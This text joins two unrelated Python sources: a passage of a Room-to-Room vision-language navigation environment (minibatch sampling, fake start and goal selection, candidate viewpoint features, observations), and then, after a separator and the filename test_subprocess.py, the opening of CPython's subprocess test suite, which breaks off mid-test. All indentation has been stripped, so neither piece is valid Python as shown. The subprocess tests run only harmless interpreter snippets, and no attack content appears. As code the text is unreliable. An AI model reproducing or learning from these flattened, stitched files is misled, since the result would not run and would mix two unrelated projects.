self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = deepcopy(batch)
self.start_list = []
self.dest_list = []
self.fake_start_list = []
self.fake_dest_list = []
for i,item in enumerate(self.batch):
self.start_list.append(item['path'][0])
self.dest_list.append(item['path'][-1])
path_length = len(item['path'])
scan = item['scan']
fake_flag = True
fail_flag = False
goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:
self.fake_dest_list.append(goal)
# print('fake_dest',i)
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake dest error')
self.fake_dest_list.append(item['path'][-1])
fake_flag = True
goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]
random.shuffle(goal_list)
for goal in goal_list:
if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:
self.fake_start_list.append(goal)
fake_flag = False
break
if fake_flag:
fail_flag = True
# print('fake start error')
self.fake_start_list.append(item['path'][0])
# print('scan',scan)
if i != 0 and fail_flag:
self.batch[i] = deepcopy(self.batch[i-1])
self.start_list[-1] = self.start_list[-2]
self.dest_list[-1] = self.dest_list[-2]
self.fake_start_list[-1] = self.fake_start_list[-2]
self.fake_dest_list[-1] = self.fake_dest_list[-2]
# cnt_dest = 0
# cnt_star = 0
# scan = self.batch[i]['scan']
# item = self.batch[i]
# # print('scan after',scan)
# fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]
# fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]
# for p in item['path']:
# if p in fake_dest_path:
# cnt_dest += 1
# if p in fake_star_path:
# cnt_star += 1
# dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]
# dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]
# print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)
# print('ori',item['path'])
# print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])
# print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])
# print('')
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
# long_id = "%s_%s" % (scanId, viewpointId)
# if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
# self.buffered_state_dict[long_id] = [
# {key: c[key]
# for key in
# ['normalized_heading', 'elevation', 'scanId', 'viewpointId',
# 'pointId', 'idx']}
# for c in candidate
# ]
return candidate
# else:
# candidate = self.buffered_state_dict[long_id]
# candidate_new = []
# for c in candidate:
# c_new = c.copy()
# ix = c_new['pointId']
# normalized_heading = c_new['normalized_heading']
# visual_feat = feature[ix]
# loc_heading = normalized_heading - base_heading
# c_new['heading'] = loc_heading
# angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
# c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
# c_new.pop('normalized_heading')
# candidate_new.append(c_new)
# return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, type_ ='ps', **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
assert type_ in ['ps','rw']
if type_ == 'rw':
for i in range(len(self.batch)):
if i % 2 == 0:
self.batch[i]['path'] = [self.fake_start_list[i],self.dest_list[i]]
else:
self.batch[i]['path'] = [self.start_list[i],self.fake_dest_list[i]]
elif type_ == 'ps':
ins_list_shuffle = []
for item in self.batch:
scan = item['scan']
ins = item['instructions']
random.shuffle(self.scan_specific_data[scan])
for _ in self.scan_specific_data[scan]:
if _['instructions'] != ins:
case = self.scan_specific_data[scan][0]
break
ins_list_shuffle.append((case['instructions'],case['instr_encoding']))
# random.shuffle(ins_list_shuffle)
for i in range(len(self.batch)):
self.batch[i]['instructions'] = ins_list_shuffle[i][0]
self.batch[i]['instr_encoding'] = ins_list_shuffle[i][1]
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
class R2RBatch_graph():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatchGraph(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None: # Filter the wrong data
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
# It means that the fake data is equals to data in the supervised setup
self.fake_data = self.data
print('R2RBatchGraph loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple view, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
# 'feature': np.concatenate((visual_feat, angle_feat), -1)
'feature': visual_feat,
'angle_feature': angle_feat
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
# c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new['feature'] = visual_feat
c_new['angle_feature'] = angle_feat
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angel_feature) for views
# feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature, # (64,2051)*36
'candidate': candidate,
'angle_feature': self.angle_feature[base_view_id], # should be concate to 'feature' after GCN's output
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
import pathlib
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
